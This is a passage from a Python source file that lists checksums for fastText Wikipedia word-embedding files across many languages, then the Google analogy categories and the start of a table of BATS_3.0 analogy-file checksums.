('wiki.ii.npz',\n '54bc16d05da512481865a89ecf30260b0acc04dc'),\n 'wiki.ik': ('wiki.ik.npz',\n 'f8015227e893d2375699b7d132b306ba381f02ac'),\n 'wiki.ilo': ('wiki.ilo.npz',\n '185a11f81bd5d24a34558dda81ee4735f5ba150b'),\n 'wiki.io': ('wiki.io.npz',\n 'ddf8180a90aa6ee5be93a2582cc99c535f21363e'),\n 'wiki.is': ('wiki.is.npz',\n '968f8dd2a093b279a6f7aaa734008454bf51d724'),\n 'wiki.it': ('wiki.it.npz',\n 'fdfb857a309b2c3d29482bb5cc55f21b858d2e6f'),\n 'wiki.iu': ('wiki.iu.npz',\n 'fa8896730bd6c24c3473daa22116d1016294e7f7'),\n 'wiki.jam': ('wiki.jam.npz',\n 'a8f0d0b99c89ace0a6401b8fcda261d06065faaf'),\n 'wiki.ja': ('wiki.ja.npz',\n '8d42e5a40e4d1d8645b2d80b873a65cadcf68b5c'),\n 'wiki.jbo': ('wiki.jbo.npz',\n '145fc999ab004b348cf9bf445f0a93a7a145308b'),\n 'wiki.jv': ('wiki.jv.npz',\n '66978770bf06e42414395cf5fd8c596044d72bec'),\n 'wiki.kaa': ('wiki.kaa.npz',\n '624a640ecb9901b2aba2e9f44ab615146ecb2862'),\n 'wiki.kab': ('wiki.kab.npz',\n 'e97f93b6ba65e95c85b7541932cf53c5ad9eb896'),\n 'wiki.ka': ('wiki.ka.npz',\n '1ca8376e1e0cbd58001c1b51a2d488a2874a6743'),\n 'wiki.kbd': ('wiki.kbd.npz',\n 'f2d2a05b06723ac549784ad5470d84f5742a1352'),\n 'wiki.kg': ('wiki.kg.npz',\n 'fa7f6d5f660a173a3e75342d449980eedcdc789e'),\n 'wiki.ki': ('wiki.ki.npz',\n '21a8c7c616c0050c51c288861f3423f313e4f634'),\n 'wiki.kj': ('wiki.kj.npz',\n 'f3c347509a0d81f4f7fdbb8b22889b8d76e5014e'),\n 'wiki.kk': ('wiki.kk.npz',\n 'bc24a3289e1c1e18e16b6789c2f9f92af1e73071'),\n 'wiki.kl': ('wiki.kl.npz',\n 'b8b7e7359f067836e2be2ecfe9f35a820b00fe1d'),\n 'wiki.km': ('wiki.km.npz',\n 'e053799fd01463808432dc035bef3e36620e2f36'),\n 'wiki.kn': ('wiki.kn.npz',\n '2849a0a8b3453e9bf6af05d4c7bd3db881dd1068'),\n 'wiki.koi': ('wiki.koi.npz',\n 'a9b02e9bd41833bcd54769f94626019c03f29997'),\n 'wiki.ko': ('wiki.ko.npz',\n '764d9896e74b5a26c6884d48bce3bed8ed3a7822'),\n 'wiki.krc': ('wiki.krc.npz',\n 'bfe39598c718f1cc95909db7544b3214b308a97c'),\n 'wiki.kr': ('wiki.kr.npz',\n '1e6af853d4a8ea7830e116eb9b61ac5d7d9a315c'),\n 'wiki.ksh': ('wiki.ksh.npz',\n '66cd0e3e0a0b0282a13960571ebe7cddd7706bf2'),\n 'wiki.ks': ('wiki.ks.npz',\n '85f1adaa05b854df4dede745a1aaab3836e60770'),\n 'wiki.ku': ('wiki.ku.npz',\n 'faf90584e5a45e6d0f9eeb88399b82abe037d584'),\n 'wiki.kv': ('wiki.kv.npz',\n '9f2b41822013a412da9c99fac06eed8be03ca192'),\n 'wiki.kw': ('wiki.kw.npz',\n '3eed8a8fc97a2fc79241b8474a458c98d00fc897'),\n 'wiki.ky': ('wiki.ky.npz',\n '0116ff90f10a6c0728e1ea86d8a44896ea83270a'),\n 'wiki.lad': ('wiki.lad.npz',\n '5af2015b3d1c5e8563f0e92721580988ebe2ce50'),\n 'wiki.la': ('wiki.la.npz',\n '7143303a3ea13c7668eb90ea6e3d2ca69857a3be'),\n 'wiki.lbe': ('wiki.lbe.npz',\n 'f206a3c35a184ba5d2b32ee68640eadf66c847da'),\n 'wiki.lb': ('wiki.lb.npz',\n '143dc6337f3690379282034c460c613d7f144923'),\n 'wiki.lez': ('wiki.lez.npz',\n 'b29a680decc6b29f24e8eb9e4f8e11e3419d45f1'),\n 'wiki.lg': ('wiki.lg.npz',\n '866640ce62cedbc1d453b7ea3c289c291ad76e13'),\n 'wiki.lij': ('wiki.lij.npz',\n '0dcd3d7009ae89b1016ca6cdb99a9f0d70bc4baf'),\n 'wiki.li': ('wiki.li.npz',\n '4666b3c238256d7b7623a136db19b8b9f4754734'),\n 'wiki.lmo': ('wiki.lmo.npz',\n 'ac89fa7cfe0675950bcb31c66bf3f88a3cfc98f0'),\n 'wiki.ln': ('wiki.ln.npz',\n 'fba158719944aabe58e0002a90be0ed77e11702d'),\n 'wiki.lo': ('wiki.lo.npz',\n '1e113e340a8a93d385e14502c9c4e3bcdf6c3101'),\n 'wiki.lrc': ('wiki.lrc.npz',\n '42cb755f398fba6f0da7949c91e92b55654bd482'),\n 'wiki.ltg': ('wiki.ltg.npz',\n '182f75859e228d1162215f28fe7f2dca127624a4'),\n 'wiki.lt': ('wiki.lt.npz',\n '66aa944bd2e777cb82d6d59b1f2f837b6c48cb37'),\n 'wiki.lv': ('wiki.lv.npz',\n '2be8f926da85694fa998bf79d80b61ebb8d67576'),\n 'wiki.mai': ('wiki.mai.npz',\n 'b8a9c36e2a0f1bb84a44dc762250d2a9007ef637'),\n 'wiki.map_bms': ('wiki.map_bms.npz',\n '6f0394d6b3d08a946e3df4b9355efe94148f018a'),\n 'wiki.mdf': ('wiki.mdf.npz',\n '774ee35334641db57f9ac9069961c5372a5d92e8'),\n 'wiki.mg': ('wiki.mg.npz',\n '496c48ef668f08ce95ebb11ce1ce5026b52d935c'),\n 'wiki.mh': ('wiki.mh.npz',\n '352edd84f99c5aa277a7306f6cacea1fab065ed3'),\n 'wiki.mhr': ('wiki.mhr.npz',\n 'dd78b27a674ac10411cdf74ac32f9391506b17e0'),\n 'wiki.min': ('wiki.min.npz',\n '628b406441ab03bc8aa68195ada50bfdc8226f34'),\n 'wiki.mi': ('wiki.mi.npz',\n '754127b473861cd4f9ae034c9f527a34827b1f00'),\n 'wiki.mk': ('wiki.mk.npz',\n 'b09fed4f56c296f13c4020ef1fec498382a38b73'),\n 'wiki.ml': ('wiki.ml.npz',\n '02fb55d97ca2f0408f0e7e8dd6a661bbc3319a2a'),\n 'wiki.mn': ('wiki.mn.npz',\n '08b2c45689aa5d9ec49df96dc7c777ce9b9a0b4b'),\n 'wiki.mo': ('wiki.mo.npz',\n '638c2e8bd2352fd52921b9ae62f578b8357bab49'),\n 'wiki.mrj': ('wiki.mrj.npz',\n 'ec5cf1f4fb8dfdca64d8172974e620eb8fa41626'),\n 'wiki.mr': ('wiki.mr.npz',\n '074dd68c947c2f137a3e84b55012925f00213139'),\n 'wiki.ms': ('wiki.ms.npz',\n '3dbe9e9d70251de8a374776ff1250a9c3103ee59'),\n 'wiki.mt': ('wiki.mt.npz',\n 'f5103998a68d1b178387417436a83123d44aba01'),\n 'wiki.multi.ar': ('wiki.multi.ar.npz',\n 'a010d1d81a465c56ebaf596b3e8e8795e7f0f8e3'),\n 'wiki.multi.bg': ('wiki.multi.bg.npz',\n 'c04018f3a600cee170f12a36cdd35b4727a2aade'),\n 'wiki.multi.ca': ('wiki.multi.ca.npz',\n 'eef52a0cf20c133ca9065de25f0702861a8cfa29'),\n 'wiki.multi.cs': ('wiki.multi.cs.npz',\n 'c5f547aa78c0e3d7dae67a0334d500bf2a86aa30'),\n 'wiki.multi.da': ('wiki.multi.da.npz',\n '24374f2ee169b33327feeee46da31b0de1622fe4'),\n 'wiki.multi.de': ('wiki.multi.de.npz',\n '2e6c119b345bebd34b56eaaf855d6703889b11f7'),\n 'wiki.multi.el': ('wiki.multi.el.npz',\n '9d122beedb80a2e5334946641e5bafd32c01e76b'),\n 'wiki.multi.en': ('wiki.multi.en.npz',\n '8c3c480b4cb2690304173713a646280613b244a8'),\n 'wiki.multi.es': ('wiki.multi.es.npz',\n '483a22656e4fb2a01e9f4ef8156b261e780850ab'),\n 'wiki.multi.et': ('wiki.multi.et.npz',\n '22498c7b91645a3874fa738b5cfb16bf98b6f97c'),\n 'wiki.multi.fi': ('wiki.multi.fi.npz',\n '765a6f0b63777bff4ae6ca2b461c5889c03d6a70'),\n 'wiki.multi.fr': ('wiki.multi.fr.npz',\n 'decd9aacf600114b8a36072535c0309874a37c83'),\n 'wiki.multi.he': ('wiki.multi.he.npz',\n '7eee940c1b85936f59122f4b1a166223dd946674'),\n 'wiki.multi.hr': ('wiki.multi.hr.npz',\n '1673963416af088f8bf15576afb33d58115db35c'),\n 'wiki.multi.hu': ('wiki.multi.hu.npz',\n 'a1fbe6ededf3cbaa3eaa22dd8b20cce4b36cfc6d'),\n 'wiki.multi.id': ('wiki.multi.id.npz',\n '6c3e721febb511ede7db7bf978d65769e4270f5c'),\n 'wiki.multi.it': ('wiki.multi.it.npz',\n 'fc5bfc11e0165e8d95c1708573dad5e456826c73'),\n 'wiki.multi.mk': ('wiki.multi.mk.npz',\n '6cd50198355674f156fc863108d9bebf11cfabd9'),\n 'wiki.multi.nl': ('wiki.multi.nl.npz',\n '4fa06b9230c95dfa5a9e9a5d80f1f5ba614d3cbf'),\n 'wiki.multi.no': ('wiki.multi.no.npz',\n '63756168c1101e73fba8d1a5015f32b8892819e6'),\n 'wiki.multi.pl': ('wiki.multi.pl.npz',\n '958b8e8bead965ba1bb1433e1c960fc3e12a10fb'),\n 'wiki.multi.pt': ('wiki.multi.pt.npz',\n '22f07df1609d79b95344ee575ea43141424a1528'),\n 'wiki.multi.ro': ('wiki.multi.ro.npz',\n '73180b3e382519004bf38ea7b86237aacbbe813a'),\n 'wiki.multi.ru': ('wiki.multi.ru.npz',\n '3b2eb9163f35e90bf2ce1cd3c997b354d0c34f59'),\n 'wiki.multi.sk': ('wiki.multi.sk.npz',\n '606a0c3ba9849070c6b6b8c22d920fdeed9a1385'),\n 'wiki.multi.sl': ('wiki.multi.sl.npz',\n '3cfdab5043b8cfe1535cb6dbd4c9e68847ad5904'),\n 'wiki.multi.sv': ('wiki.multi.sv.npz',\n '4f1494885b9a831e87cfa3c15f2204c4a73c0779'),\n 'wiki.multi.tr': ('wiki.multi.tr.npz',\n '54f90d5ddb9a65538a41e37c5a67ed933a5e4885'),\n 'wiki.multi.uk': ('wiki.multi.uk.npz',\n '500fd26b1d7a25b42458012e99f9f76642e0c787'),\n 'wiki.multi.vi': ('wiki.multi.vi.npz',\n '3955809cceb300965c15f9372221417719bb0db8'),\n 'wiki.mus': ('wiki.mus.npz',\n 'a5f48934a3fa6eaf4929098046c93fc94dd6bcb6'),\n 'wiki.mwl': ('wiki.mwl.npz',\n '8a5e2c272166f8a72c5694ca6c3104d5f49179ec'),\n 'wiki.my': ('wiki.my.npz',\n '5e035aca16700d7d6695af8a6d3a88ac847aaeb7'),\n 'wiki.myv': ('wiki.myv.npz',\n 'd4cfaab70c640033e02c0fc0c5a3615ae836c569'),\n 'wiki.mzn': ('wiki.mzn.npz',\n 'ad09ac584ae455b5862b95125ef409360ae18445'),\n 'wiki.nah': ('wiki.nah.npz',\n '2dc454ef37d059f2053af46cfa1f4f0ca939cba0'),\n 'wiki.na': ('wiki.na.npz',\n '401f0f880eb7aa78d21348bc1e0a3953b3e81bf0'),\n 'wiki.nap': ('wiki.nap.npz',\n '996da46aeeab5644ba766d00c5e343b1553361d7'),\n 'wiki.nds_nl': ('wiki.nds_nl.npz',\n '5a9307e16b13a5a82ec19a52b33254537e7198e7'),\n 'wiki.nds': ('wiki.nds.npz',\n 'b249a87c78c52becf51e7b50aaf9f9b6a36585f1'),\n 'wiki.ne': ('wiki.ne.npz',\n 'a601db2647a74ffd2b4b43dcb8584735f555459c'),\n 'wiki.new': ('wiki.new.npz',\n 'c398a3775aba9c68ce765cfdfb6b188f7c47e4c6'),\n 'wiki-news-300d-1M': ('wiki-news-300d-1M.npz',\n '0a03bbd508e5381e140476140fb121afeb0050ed'),\n 'wiki-news-300d-1M-subword': ('wiki-news-300d-1M-subword.npz',\n '69edae21375407781c727dcb9e534e79d712d137'),\n 'wiki.ng': ('wiki.ng.npz',\n 'befd774d15f69d43547e13e5ea3a97c4cb1ab405'),\n 'wiki.nl': ('wiki.nl.npz',\n '5a7cb6f1dd0a7621202abba9461ac2c5bf905219'),\n 'wiki.nn': ('wiki.nn.npz',\n '8e5059ddeb24050fadaa5cc4622b13feb3e4a226'),\n 'wiki.no': ('wiki.no.npz',\n '5ce6e0f793e66f081652f64013968099de03d9f9'),\n 'wiki.nov': ('wiki.nov.npz',\n '95ed23b4cfd7a65afa1c12c7dbdce6af53923d77'),\n 'wiki.vec': ('wiki.vec.npz',\n '08ebb912efeb9df1c7d05e1af90484d210dff47e'),\n 'wiki.nrm': ('wiki.nrm.npz',\n 'e58614b4508ff9810f0b58fd818f973775bc918d'),\n 'wiki.nso': ('wiki.nso.npz',\n '56a2ebe260241402d117cd89c5c872b9c96ff05b'),\n 'wiki.nv': ('wiki.nv.npz',\n 'c713051fe03ec1f60314bb42161b2a47fb5e169a'),\n 'wiki.ny': ('wiki.ny.npz',\n 'ba5a1725955cbc13e7fd93ab499f8085840c992c'),\n 'wiki.oc': ('wiki.oc.npz',\n '259e7d994c38a4cfc140fb07016b82d6781e5027'),\n 'wiki.olo': ('wiki.olo.npz',\n '0fea70f887def4779ee70a79366b88f1ada65004'),\n 'wiki.om': ('wiki.om.npz',\n '47e2d756b5f8913085d901375c1b4e0b118a4221'),\n 'wiki.or': ('wiki.or.npz',\n '7e274ab060219b019aa02bb97941cc6e162fd01f'),\n 'wiki.os': ('wiki.os.npz',\n '19e8199cc2aaffdb07b6c558dbc5465ac6e03155'),\n 'wiki.pag': ('wiki.pag.npz',\n 'eddf4931547649026c02f893297ef673ec6158bb'),\n 'wiki.pam': ('wiki.pam.npz',\n '40109aa174bd9f0fa657839bb548e2b0646c58d3'),\n 'wiki.pa': ('wiki.pa.npz',\n '8a5870717e9e641b1f757f13259171698118de2e'),\n 'wiki.pap': ('wiki.pap.npz',\n '999c8e5b005ca20d9998fbbe4fa79177f69e24c0'),\n 'wiki.pcd': ('wiki.pcd.npz',\n 'e975066b323a65cdc5e4c27138ef674d2cf7250b'),\n 'wiki.pdc': ('wiki.pdc.npz',\n '5c770b9d56f276b0aa535845f175c05ee1cea615'),\n 'wiki.pfl': ('wiki.pfl.npz',\n '0063d0b633ee529a75482b36ed4f4da7d64994ec'),\n 'wiki.pih': ('wiki.pih.npz',\n 'ce1d76c94d248545eea0d7436c54849dbb380bfc'),\n 'wiki.pi': ('wiki.pi.npz',\n 'c7d56c334bf529f8b3655693d207a80feaec4aed'),\n 'wiki.pl': ('wiki.pl.npz',\n '0d612fdf871a1a4084c867f394940475be899443'),\n 'wiki.pms': ('wiki.pms.npz',\n 'ca149a2fb138011315bb6d5d61c7a5647e515e51'),\n 'wiki.pnb': ('wiki.pnb.npz',\n '9ec82d02ad8894056c67991cf8ce927bcca74ee2'),\n 'wiki.pnt': ('wiki.pnt.npz',\n '3f90123407bb8fc838a0a0d3700a14e15f5b26aa'),\n 'wiki.ps': ('wiki.ps.npz',\n '7edebc02ac16f5fab83eb10b7d0fab821a9a4d43'),\n 'wiki.pt': ('wiki.pt.npz',\n 'f172fd801edd1ad9d319ba44146d40b5d682a473'),\n 'wiki.qu': ('wiki.qu.npz',\n '68bec60ccfe1826c3b3a8968574488dbc74cdf7b'),\n 'wiki.rm': ('wiki.rm.npz',\n '00fb191fc736ba60cb23e76169dfccde9a9daad0'),\n 'wiki.rmy': ('wiki.rmy.npz',\n 'c5e93cc37ff7293b9a1d9fe55c42d6fbde372b97'),\n 'wiki.rn': ('wiki.rn.npz',\n '57b8e0d6999269be227af6ef2797a9cf8386ff1b'),\n 'wiki.roa_rup': ('wiki.roa_rup.npz',\n 'e06d6b5672a59bb9e83143bc8b28300d23c09546'),\n 'wiki.roa_tara': ('wiki.roa_tara.npz',\n 'c083105f40236dc3711f06c1b40e8ee7a714b99d'),\n 'wiki.ro': ('wiki.ro.npz',\n '766bc0cb58a65b0b1763b9a0d90e91ab982eb20d'),\n 'wiki.rue': ('wiki.rue.npz',\n '9a91fa093cd48d7d658d526b0ccda48dc59cd7f4'),\n 'wiki.ru': ('wiki.ru.npz',\n 'd59d099481c22d5592ab9635c9ee48060aa0bf45'),\n 'wiki.rw': ('wiki.rw.npz',\n 'e99ee87d249f6c157c5c97397d1025d798b85c69'),\n 'wiki.sah': ('wiki.sah.npz',\n '85dae39097b29bc8e2b64f343a77794e4a62f91a'),\n 'wiki.sa': ('wiki.sa.npz',\n '7d1928d7c67400045ac1b35a37a0e3089690d875'),\n 'wiki.scn': ('wiki.scn.npz',\n '27d7b8050bbeed8ce196061c610216760b053c39'),\n 'wiki.sc': ('wiki.sc.npz',\n '69c7b8be0f03a1bbd615695f93bdd78f96a58e16'),\n 'wiki.sco': ('wiki.sco.npz',\n '4880282f59d3338b67fbff75359e2d24896e95bb'),\n 'wiki.sd': ('wiki.sd.npz',\n '0ed8da4d27223db717a612cf0c88582351db6e19'),\n 'wiki.se': ('wiki.se.npz',\n '0f4b2e060d5e29f96ca73aab29c967e79db69c17'),\n 'wiki.sg': ('wiki.sg.npz',\n 'a5e4edf34fe1a88b322da4c3922ec5a470e200c6'),\n 'wiki.sh': ('wiki.sh.npz',\n 'c13f1e94676bc939560193f7aa7ffd7d604707b3'),\n 'wiki.simple': ('wiki.simple.npz',\n '352d0575e7d60b08e1dfce2c5de713906f0ed78f'),\n 'wiki.si': ('wiki.si.npz',\n '204f9ffbe7770a9f56d3b2fb26999165015f5c33'),\n 'wiki.sk': ('wiki.sk.npz',\n '7a9820b5a343b242660bf2595d1ecbf6e00a76d6'),\n 'wiki.sl': ('wiki.sl.npz',\n '85f3186f26d6725317a64e290363a7251b928b81'),\n 'wiki.sm': ('wiki.sm.npz',\n '9e13452cc4bff677f4f15db04f9d2f95f6ec054c'),\n 'wiki.sn': ('wiki.sn.npz',\n 'e8d5f7dcf51280c5f99bc3df849b4889a61e9fcd'),\n 'wiki.so': ('wiki.so.npz',\n '0f5d71b95768b33fd939a870c15344c4478364a9'),\n 'wiki.sq': ('wiki.sq.npz',\n '8b05826df8575e65c87a2fc0b7630cf644d4216d'),\n 'wiki.srn': ('wiki.srn.npz',\n '2711396ef297ac5dde8904508bc002bdecbcc6f4'),\n 'wiki.sr': ('wiki.sr.npz',\n '546edc8e29a5d2e99ed10eb4a552cbef2bb8f417'),\n 'wiki.ss': ('wiki.ss.npz',\n '2e5911bad79bb5270a64f587e326d31c95ec58f3'),\n 'wiki.st': ('wiki.st.npz',\n '23bc954719a2962e891f02efaea754c9ea025894'),\n 'wiki.stq': ('wiki.stq.npz',\n 'dd3ece0c0aa30e53ae0f4b558309bb60ab628652'),\n 'wiki.su': ('wiki.su.npz',\n '7e48732e8a1fcf212e692924a4416a6ac3b3b055'),\n 'wiki.sv': ('wiki.sv.npz',\n 'b9ec52e9423688f195f3145c243226c0e0b51e83'),\n 'wiki.sw': ('wiki.sw.npz',\n '5262f0c645322b10eca73f792a970f10b2719e55'),\n 'wiki.szl': ('wiki.szl.npz',\n 'fdd6d6b291cdbbcec5ff93451a588fdd103bb2d0'),\n 'wiki.ta': ('wiki.ta.npz',\n 'da7c5bc6e1142306ff2669bf1739832beb6c1763'),\n 'wiki.tcy': ('wiki.tcy.npz',\n 'baa49e1afa2bb0dcaaef0fac1ee75bbe711d1134'),\n 'wiki.te': ('wiki.te.npz',\n 'baf48767ce85e4d41d65d25f2bbf1c5f559ec18f'),\n 'wiki.tet': ('wiki.tet.npz',\n '11e46a893af55344dbe102d530fdfea5d949d3bc'),\n 'wiki.tg': ('wiki.tg.npz',\n 'da66abb72ec9ccc602713161e544963d59cc51d7'),\n 'wiki.th': ('wiki.th.npz',\n '25e54bf2d305779ec9baa5f344410bd75c7702fc'),\n 'wiki.ti': ('wiki.ti.npz',\n '1faf98f3a0eafa7559a4b2a111f43dd1f7b9a05b'),\n 'wiki.tk': ('wiki.tk.npz',\n '34c714fa8275fd6abfe86b2d144a043774552a6c'),\n 'wiki.tl': ('wiki.tl.npz',\n '7d7f8a0485155bce7a74a1d778824375b0029f53'),\n 'wiki.tn': ('wiki.tn.npz',\n 'd0bc3a9b948753ac2283e5e10480c9fa0f6acb53'),\n 'wiki.to': ('wiki.to.npz',\n 'e982fc31bcfcf7339988d7aad21ce29ac9e84b0b'),\n 'wiki.tpi': ('wiki.tpi.npz',\n '448cef043fa4b7f97825dbf8ee205ef05543bcac'),\n 'wiki.tr': ('wiki.tr.npz',\n 'c9830607a4c5134c6191006f1d80bae0ec798fe6'),\n 'wiki.ts': ('wiki.ts.npz',\n '84a0598803712c8a713943447ddb73fc0f39af43'),\n 'wiki.tt': ('wiki.tt.npz',\n '82c29df18f33e6284af3e977a6dda7e132a7a225'),\n 'wiki.tum': ('wiki.tum.npz',\n '358990b894a3fb09d70674465952d828c9b0eda7'),\n 'wiki.tw': ('wiki.tw.npz',\n '1e6d2838a4f271c1808795fb929cfcbf95094d93'),\n 'wiki.ty': ('wiki.ty.npz',\n 'e41ca5192d8cb515b3561c8d6935b150deb027b7'),\n 'wiki.tyv': ('wiki.tyv.npz',\n 'ce062ed32e854604714b65698ae290c99ba28060'),\n 'wiki.udm': ('wiki.udm.npz',\n '9e1c5891ee0c5ac8f65fc457e1b42c7b2bfc8d37'),\n 'wiki.ug': ('wiki.ug.npz',\n '656503e54063e200980e39f00fc011395bcd8551'),\n 'wiki.uk': ('wiki.uk.npz',\n '352b7ee24d9fc6513fff4fe13bc04086c680834a'),\n 'wiki.ur': ('wiki.ur.npz',\n 'a81e55c7adfc2cef779ce9a01fe21319a7e4943b'),\n 'wiki.uz': ('wiki.uz.npz',\n 'd60d1e67bb8574dd71c18c88114aba674fc1eecb'),\n 'wiki.ve': ('wiki.ve.npz',\n '5bfc3dbb3e47d23597df47ef12bd1c64ab8d3ea9'),\n 'wiki.vep': ('wiki.vep.npz',\n '7a94355754fbe56802242c0bf9d7a27335095552'),\n 'wiki.vi': ('wiki.vi.npz',\n 'f118039eb16a4ca3347b6b171eac41113350a041'),\n 'wiki.vls': ('wiki.vls.npz',\n '9a46a2fdc6448aa54f212081643745499ea7d05c'),\n 'wiki.vo': ('wiki.vo.npz',\n '8e2f93c85ac608bcc4ae14093b9ff016061378fb'),\n 'wiki.wa': ('wiki.wa.npz',\n '907074f7743d30cdbb2c48d0c8b4040796ea4164'),\n 'wiki.war': ('wiki.war.npz',\n '928fb410c394b9c18d875326b6a3e750e2611e1b'),\n 'wiki.wo': ('wiki.wo.npz',\n '7bb352be44f7261aa926f49b13e77df30f29312f'),\n 'wiki.wuu': ('wiki.wuu.npz',\n '0d1dc7b05867ff2156a1180ad3da3b4697924e59'),\n 'wiki.xal': ('wiki.xal.npz',\n 'd87f4a131e086dc0bdc2a7e10406820c3c03b6a9'),\n 'wiki.xh': ('wiki.xh.npz',\n 'c64e1d2e77d1c744a628e2bd7353284616e48bea'),\n 'wiki.xmf': ('wiki.xmf.npz',\n '160b9ee9773b9099aaf37ae9bdbc8a4a93b7f6ea'),\n 'wiki.yi': ('wiki.yi.npz',\n '0662542cee29f3392fc905004ac6443b32c1477c'),\n 'wiki.yo': ('wiki.yo.npz',\n '5d12d3b902a1fa19d8548295c3802c0608afa5c8'),\n 'wiki.za': ('wiki.za.npz',\n '536348ff89df62e968739b567a1245bfd4112fbe'),\n 'wiki.zea': ('wiki.zea.npz',\n '61fa192289a7c0f73ffa8035632a38b91c31c224'),\n 'wiki.zh_classical': ('wiki.zh_classical.npz',\n '9acc9eaf8ebe316b945fb1f56ac71a2b7e024854'),\n 'wiki.zh_min_nan': ('wiki.zh_min_nan.npz',\n '5d38bc025c82af578299d60f7df7b399de6ed81a'),\n 'wiki.zh': ('wiki.zh.npz',\n '94007fcf3b105bf2c21b84a3a22bdb7946e74804'),\n 'wiki.zh_yue': ('wiki.zh_yue.npz',\n 'af6f0d94e6418d528d6cedd859e07e6e2fb416ab'),\n 'wiki.zu': ('wiki.zu.npz',\n 'fc9ce07d5d0c49a3c86cf1b26056ada58f9404ca')}\n\nGOOGLEANALOGY_CATEGORIES = [\n 'capital-common-countries', 'capital-world', 'currency', 'city-in-state',\n 'family', 'gram1-adjective-to-adverb', 'gram2-opposite',\n 'gram3-comparative', 'gram4-superlative', 'gram5-present-participle',\n 'gram6-nationality-adjective', 'gram7-past-tense', 'gram8-plural',\n 'gram9-plural-verbs'\n]\n\nBATS_CHECKSUMS = \\\n {'BATS_3.0/1_Inflectional_morphology/I01 [noun - plural_reg].txt':\n 'cfcba2835edf81abf11b84defd2f4daa3ca0b0bf',\n 'BATS_3.0/1_Inflectional_morphology/I02 [noun - plural_irreg].txt':\n '44dbc56432b79ff5ce2ef80b6840a8aa916524f9',\n 'BATS_3.0/1_Inflectional_morphology/I03 [adj - comparative].txt':\n 'dc530918e98b467b8102a7dab772a66d3db32a73',\n 'BATS_3.0/1_Inflectional_morphology/I04 [adj - superlative].txt':\n '6c6fdfb6c733bc9b298d95013765163f42faf6fb',\n 'BATS_3.0/1_Inflectional_morphology/I05 [verb_inf - 3pSg].txt':\n '39fa47ec7238ddb3f9818bc586f23f55b55418d8',\n 'BATS_3.0/1_Inflectional_morphology/I06 [verb_inf - Ving].txt':\n '8fabeb9f5af6c3e7154a220b7034bbe5b900c36f',\n 'BATS_3.0/1_Inflectional_morphology/I07 [verb_inf - Ved].txt':\n 'aa04df95aa2edb436cbcc03c7b15bc492ece52d6',\n 'BATS_3.0/1_Inflectional_morphology/I08 [verb_Ving - 3pSg].txt':\n '5f22d8121a5043ce76d3b6b53a49a7bb3fe33920',\n 'BATS_3.0/1_Inflectional_morphology/I09 [verb_Ving - Ved].txt':\n '377777c1e793c638e72c010228156d01f916708e',\n 'BATS_3.0/1_Inflectional_morphology/I10 [verb_3pSg - Ved].txt':\n '051c0c3c633e10900f827991dac14cf76da7f022',\n 'BATS_3.0/2_Derivational_morphology/D01 [noun+less_reg].txt':\n '5d6839e9d34ee1e9fddb5bbf6516cf6420b85d8d',\n 'BATS_3.0/2_Derivational_morphology/D02 [un+adj_reg].txt':\n '80b82227a0d5f7377f1e8cebe28c582bfeb1afb5',\n 'BATS_3.0/2_Derivational_morphology/D03 [adj+ly_reg].txt':\n '223e120bd61b3116298a253f392654c15ad5a39a',\n 'BATS_3.0/2_Derivational_morphology/D04 [over+adj_reg].txt':\n 'a56f8685af489bcd09c36f864eba1657ce0a7c28',\n 'BATS_3.0/2_Derivational_morphology/D05 [adj+ness_reg].txt':\n '5da99b1f1781ecfb4a1a7448c715abf07451917b',\n 'BATS_3.0/2_Derivational_morphology/D06 [re+verb_reg].txt':\n '4c5e1796091fade503fbf0bfc2fae2c7f98b5dd2',\n 'BATS_3.0/2_Derivational_morphology/D07 [verb+able_reg].txt':\n 'a6218162bc257d98e875fc667c23edfac59e19fd',\n 'BATS_3.0/2_Derivational_morphology/D08 [verb+er_irreg].txt':\n '9a4236c3bbc23903e101a42fb5ad6e15e552fadf',\n 'BATS_3.0/2_Derivational_morphology/D09 [verb+tion_irreg].txt':\n '3ab0153926d5cf890cf08a4077da6d9946133874',\n 'BATS_3.0/2_Derivational_morphology/D10 [verb+ment_irreg].txt':\n '2a012b87a9a60e128e064c5fe24b60f99e16ddce',\n 'BATS_3.0/3_Encyclopedic_semantics/E01 [country - capital].txt':\n '9890315d3c4e6a38b8ae5fc441858564be3d3dc4',\n 'BATS_3.0/3_Encyclopedic_semantics/E02 [country - language].txt':\n 'ef08a00e8ff7802811ace8f00fabac41b5d03678',\n 'BATS_3.0/3_Encyclopedic_semantics/E03 [UK_city - county].txt':\n '754957101c93a25b438785bd4458404cd9010259',\n 'BATS_3.0/3_Encyclopedic_semantics/E04 [name - nationality].txt':\n '71a6562c34fb6154992a7c3e499375fcc3529c96',\n 'BATS_3.0/3_Encyclopedic_semantics/E05 [name - occupation].txt':\n 'a9a6f9f1af959aef83106f3dbd6bed16dfe9a3ea',\n 'BATS_3.0/3_Encyclopedic_semantics/E06 [animal - young].txt':\n '12d5b51c7b76b9136eadc719abc8cf4806c67b73',\n 'BATS_3.0/3_Encyclopedic_semantics/E07 [animal - sound].txt':\n '91991b007a35f45bd42bd7d0d465c6f8311df911',\n 'BATS_3.0/3_Encyclopedic_semantics/E08 [animal - shelter].txt':\n 'e5af11e216db392986ba0cbb597d861066c29adb',\n 'BATS_3.0/3_Encyclopedic_semantics/E09 [things - color].txt':\n 'd30b2eb2fc7a60f19afda7c54582e30f6fe28f51',\n 'BATS_3.0/3_Encyclopedic_semantics/E10 [male - female].txt':\n '247a588671bc1da8f615e14076bd42573d24b4b3',\n 'BATS_3.0/4_Lexicographic_semantics/L01 [hypernyms - animals].txt':\n '4b5c4dabe2c9c038fafee85d8d3958f1b1dec987',\n 'BATS_3.0/4_Lexicographic_semantics/L02 [hypernyms - misc].txt':\n '83d5ecad78d9de28fd70347731c7ee5918ba43c9',\n 'BATS_3.0/4_Lexicographic_semantics/L03 [hyponyms - misc].txt':\n 'a8319856ae2f76b4d4c030ac7e899bb3a06a9a48',\n 'BATS_3.0/4_Lexicographic_semantics/L04 [meronyms - substance].txt':\n 'c081e1104e1b40725063f4b39d13d1ec12496bfd',\n 'BATS_3.0/4_Lexicographic_semantics/L05 [meronyms - member].txt':\n 'bcbf05f3be76cef990a74674a9999a0bb9790a07',\n 'BATS_3.0/4_Lexicographic_semantics/L06 [meronyms - part].txt':\n '2f9bdcc74b881e1c54b391c9a6e7ea6243b3accc',\n 'BATS_3.0/4_Lexicographic_semantics/L07 [synonyms - intensity].txt':\n '8fa287860b096bef004fe0f6557e4f686e3da81a',\n 'BATS_3.0/4_Lexicographic_semantics/L08 [synonyms - exact].txt':\n 'a17c591961bddefd97ae5df71f9d1559ce7900f4',\n 